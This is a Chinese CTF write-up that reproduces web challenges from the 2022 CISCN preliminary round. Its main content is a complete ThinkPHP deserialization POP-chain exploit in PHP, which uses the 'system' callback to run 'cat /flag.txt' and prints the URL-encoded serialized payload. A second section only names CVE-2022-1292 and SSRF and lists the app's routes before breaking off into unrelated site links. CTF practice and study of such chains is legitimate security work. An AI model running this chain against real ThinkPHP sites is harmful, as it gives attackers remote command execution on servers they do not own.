[2022 CISCN]初赛 web题目复现

发布时间:2024-05-02 15:01

ezpop

源码泄露www.zip,用网上的链子直接打



namespace think\model\concern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag.txt"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

online_crt

考点:

CVE-2022-1292

SSRF

项目分析

项目后端为python+go,其中python部署在外网,go通过python转发到内网

先看python,一共有四个路由:

  • /为主界面

  • /getcrt生成一个x509证书

  • /createlink调用c_rehash创建证书链接

  • /proxy通过代理访问go内网服务

相关推荐

MySQL读写分离原理及步骤

C语言算法的时间复杂度和空间复杂度

Redis实战案例及问题分析之redis解决商户缓存以及相应缓存问题解决方案(穿透、雪崩、击穿)

three.js中坐标系转换以及camera的position、lookAt与up属性理解

pytest使用@pytest.mark.parametrize()实现参数化的示例代码

(九)PyTorch深度学习:卷积神经网络( GoogleNet网络架构中的 inception module 模块为本次卷积神经网络架构)

CTO与CIO选型数据中台的几大建议

Unity3D 学习笔记

【MindSpore-GPU-1.1.0】【LeNet5】训练报cudaHostAlloc failed

目录

SpringBoot 异步任务-使用@Async注解

SpringBoot接口 - 如何优雅的写Controller并统一异常处理?

FlinkSQL平台化之路-StreamX提交源码剖析

中等-18-四数之和

reduce()方法详解

解决sns.load_dataset()加载失败问题&github下载缓慢问题

QS-100模块环境搭建(Linux)

科普:从基础开始谈Sql Server数据库渗透

因果推理综述—基于论文《A Survey on Causal Inference》总结

新图灵测试背后,智能交互点燃了哪些产业可能性?

ItVuer - 免责声明 - 关于我们 - 联系我们

本网站信息来源于互联网,如有侵权请联系:561261067@qq.com

桂ICP备16001015号